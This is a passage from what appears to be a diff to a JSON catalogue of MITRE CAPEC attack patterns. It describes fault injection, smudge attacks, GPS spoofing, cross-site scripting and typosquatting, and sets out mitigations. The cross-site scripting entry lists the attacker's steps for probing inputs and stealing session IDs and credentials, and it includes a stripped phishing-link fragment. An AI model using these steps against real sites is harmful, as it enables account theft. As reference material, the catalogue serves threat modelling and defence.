"2018-07-31T00:00:00.000Z", + "name": "Compromising Emanations Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Capture vibrations/emissions from the handset or retransmission device display screen to recreat display information from a distance.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Proximal access to the device." + ], + "x_capec_skills_required": { + "High": "Sophisticated attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "None are known.", + "id": "course-of-action--1f959357-f511-4f0e-9b12-51ee99284c2f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-623-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2ad7be7d-7b09-4472-bc30-41894c39f568", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f959357-f511-4f0e-9b12-51ee99284c2f", + "target_ref": "attack-pattern--3d5bbdf7-b642-43b4-b4be-d9f35923380d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary uses disruptive signals or events, or alters the physical environment a device operates in, to cause faulty behavior in electronic devices. This can include electromagnetic pulses, laser pulses, clock glitches, ambient temperature extremes, and more. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information.", + "external_references": [ + { + "external_id": "CAPEC-624", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/624.html" + }, + { + "external_id": "CWE-1247", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1247.html" + }, + { + "external_id": "CWE-1248", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1248.html" + }, + { + "external_id": "CWE-1256", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1256.html" + }, + { + "external_id": "CWE-1319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1319.html" + }, + { + "external_id": "CWE-1332", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1332.html" + }, + { + "external_id": "CWE-1334", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1334.html" + }, + { + "external_id": "CWE-1338", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1338.html" + }, + { + "external_id": "CWE-1351", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1351.html" + } + ], + "id": "attack-pattern--965d88fd-a632-4960-b4ba-7521878a0ba3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Fault Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_alternate_terms": [ + "Side-Channel Attack" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data.)", + "Bypass Protection Mechanism (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data.)", + "Hide Activities (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (If an adversary is able to inject data via a fault or side channel vulnerability towards malicious ends, the integrity of the application or information system will be compromised.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255" + ], + "x_capec_prerequisites": [ + "Physical access to the system", + "The adversary must be cognizant of where fault injection vulnerabilities exist in the system in order to leverage them for exploitation." + ], + "x_capec_resources_required": [ + "\n The relevant sensors and tools to detect and analyze fault/side-channel data from a system.\n A tool capable of injecting fault/side-channel data into a system or application.\n " + ], + "x_capec_skills_required": { + "High": "Adversaries require non-trivial technical skills to create and implement fault injection attacks. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement robust physical security countermeasures and monitoring.", + "id": "course-of-action--f6d53020-4245-4f4d-848b-e5ddf8d7db8e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-624-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--92d3b28d-cca3-4d44-82ca-d1fce4083918", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f6d53020-4245-4f4d-848b-e5ddf8d7db8e", + "target_ref": "attack-pattern--965d88fd-a632-4960-b4ba-7521878a0ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Fault injection attacks against mobile devices use disruptive signals or events (e.g. electromagnetic pulses, laser pulses, clock glitches, etc.) to cause faulty behavior. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information. Although this attack usually requires physical control of the mobile device, it is non-destructive, and the device can be used after the attack without any indication that secret keys were compromised.", + "external_references": [ + { + "external_id": "CAPEC-625", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/625.html" + }, + { + "external_id": "CWE-1247", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1247.html" + }, + { + "external_id": "CWE-1248", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1248.html" + }, + { + "external_id": "CWE-1256", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1256.html" + }, + { + "external_id": "CWE-1319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1319.html" + }, + { + "external_id": "CWE-1332", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1332.html" + }, + { + "external_id": "CWE-1334", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1334.html" + }, + { + "external_id": "CWE-1338", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1338.html" + }, + { + "external_id": "CWE-1351", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1351.html" + } + ], + "id": "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Mobile Device Fault Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--965d88fd-a632-4960-b4ba-7521878a0ba3" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data (Extract long-term secret keys (e.g. keys used for VPN or WiFi authentication and encryption) to enable decryption of intercepted VOIP traffic.)" + ], + "Confidentiality": [ + "Read Data (Extract long-term secret keys (e.g. keys used for VPN or WiFi authentication and encryption) to enable decryption of intercepted VOIP traffic.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_skills_required": { + "High": "Adversaries require non-trivial technical skills to create and implement fault injection attacks on mobile devices. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required. This prerequisite makes the attack challenging to perform (assuming that physical security countermeasures and monitoring are in place)." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--224113f1-e834-46f3-9de8-b99b4daabd5a", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "target_ref": "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequent changes to secret keys and certificates.", + "id": "course-of-action--b219b8f8-c28d-470b-8031-48f247b21a37", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-625-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11480983-629b-48d4-bb0d-9b7bede4d597", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b219b8f8-c28d-470b-8031-48f247b21a37", + "target_ref": "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Attacks that reveal the password/passcode pattern on a touchscreen device by detecting oil smudges left behind by the user’s fingers.", + "external_references": [ + { + "external_id": "CAPEC-626", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/626.html" + } + ], + "id": "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Smudge Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "The attacker must have physical access to the device." + ], + "x_capec_skills_required": { + "Medium": "The attacker must know how to make use of these smudges." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of the device.", + "id": "course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-626-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f1608da-3175-4247-965b-9dee8d21b05f", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb", + "target_ref": "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attempts to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These spoofed signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary.", + "external_references": [ + { + "external_id": "CAPEC-627", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/627.html" + } + ], + "id": "attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Counterfeit GPS Signals", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--3b7a108f-f42f-42c7-99be-a16ec15ca0ff" + ], + "x_capec_prerequisites": [ + "The target must be relying on valid GPS signal to perform critical operations." + ], + "x_capec_resources_required": [ + "Ability to create spoofed GPS signals." + ], + "x_capec_skills_required": { + "High": "The ability to spoof GPS signals is not trival." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A common form of a GPS spoofing attack, commonly termed a carry-off attack begins with an adversary broadcasting signals synchronized with the genuine signals observed by the target receiver. The power of the counterfeit signals is then gradually increased and drawn away from the genuine signals. Over time, the adversary can carry the target away from their intended destination and toward a location chosen by the adversary.", + "external_references": [ + { + "external_id": "CAPEC-628", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/628.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-489", + "source_name": "reference_from_CAPEC", + "url": "https://en.wikipedia.org/wiki/Spoofing_attack#GPS_Spoofing" + } + ], + "id": "attack-pattern--3b7a108f-f42f-42c7-99be-a16ec15ca0ff", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Carry-Off GPS Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74" + ], + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "A \"proof-of-concept\" attack was successfully performed in June, 2013, when the luxury yacht \"White Rose\" was misdirected with spoofed GPS signals from Monaco to the island of Rhodes by a group of aerospace engineering students from the Cockrell School of Engineering at the University of Texas in Austin. The students were aboard the yacht, allowing their spoofing equipment to gradually overpower the signal strengths of the actual GPS constellation satellites, altering the course of the yacht." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must be relying on valid GPS signal to perform critical operations." + ], + "x_capec_skills_required": { + "High": "This attack requires advanced knoweldge in GPS technology." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-629", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/629.html" + } + ], + "id": "attack-pattern--61baa525-b9a3-4474-98d9-7645906e4cc3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DEPRECATED: Unauthorized Use of Device Resources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary embeds malicious scripts in content that will be served to web browsers. The goal of the attack is for the target software, the client-side browser, to execute the script with the users' privilege level. An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts. Web browsers, for example, have some simple security controls in place, but if a remote attacker is allowed to execute scripts (through injecting them in to user-generated content like bulletin boards) then these controls may be bypassed. Further, these attacks are very difficult for an end user to detect.", + "external_references": [ + { + "external_id": "CAPEC-63", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/63.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "Cross-Site Scripting", + "external_id": "08", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Cross-Site-Scripting" + }, + { + "description": "Cross Site Scripting (XSS)", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/xss" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cross-Site Scripting (XSS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--8bd0c718-f126-4397-9754-c5225da7b696", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Classic phishing attacks lure users to click on content that appears trustworthy, such as logos, and links that seem to go to their trusted financial institutions and online auction sites. But instead the attacker appends malicious scripts into the otherwise innocent appearing resources. The HTML source for a standard phishing attack looks like this:\n maliciousscript\">Trusted Site\n When the user clicks the link, the appended script also executes on the local user's machine.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for XSS vulnerability: The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

    2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of XSS probe strings to inject script into UI entry fields. If possible, the probe strings contain a unique identifier.
    Use a list of XSS probe strings to inject script into resources accessed by the application. If possible, the probe strings contain a unique identifier.

Exploit

  1. Steal session IDs, credentials, page content, etc.: As the attacker succeeds in exploiting the vulnerability, they can choose to steal user's credentials in order to reuse or to analyze them later on.

    2. Techniques
    Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.
    Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.

  2. Forceful browsing: When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).

    3. Techniques
    Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
    Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).

  3. Content spoofing: By manipulating the content, the attacker targets the information that the user would like to get from the website.

    4. Techniques
    Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_prerequisites": [ + "Target client software must be a client that allows scripting communication from remote hosts, such as a JavaScript-enabled Web Browser." + ], + "x_capec_resources_required": [ + "Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine." + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an attacker can simply place a script in bulletin board, blog, wiki, or other user-generated content site that are echoed back to other client machines." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b2e5df5-9856-4289-90c4-ecaa908f4206", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9acc276d-8c69-42b8-af78-29193fa00cba", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f74ac5d-bb0a-4f7e-9601-cfc8bac01201", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dabf76e9-8f71-45cd-a775-c1d8040bd5a8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--950d64aa-75ae-40ab-993f-9a539cc6ce36", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e7f5d816-04cc-4ad5-823a-b420121bb86e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6e23539-a2eb-4b8f-a47e-aac60fb3f876", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6b510bd-d7a8-4d02-aef8-cdfb98c31f65", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name with at least one character different than a trusted domain. A TypoSquatting attack takes advantage of instances where a user mistypes a URL (e.g. www.goggle.com) or not does visually verify a URL before clicking on it (e.g. phishing attack). As a result, the user is directed to an adversary-controlled destination. TypoSquatting does not require an attack against the trusted domain or complicated reverse engineering.", + "external_references": [ + { + "external_id": "CAPEC-630", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/630.html" + }, + { + "description": "Nick Nikiforakis, Marco Balduzzi, Lieven Desmet, Frank Piessens, Wouter Joosen, Soundsquatting: Uncovering the Use of Homophones in Domain Squatting, Trend Micro", + "external_id": "REF-491", + "source_name": "reference_from_CAPEC", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-soundsquatting.pdf" + } + ], + "id": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "TypoSquatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful TypoSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "\n An adversary sends an email, impersonating paypal.com, to a user stating that they have just received a money transfer and to click the given link to obtain their money.\n However, the link the in email is paypa1.com instead of paypal.com, which the user clicks without fully reading the link.\n The user is directed to the adversary's 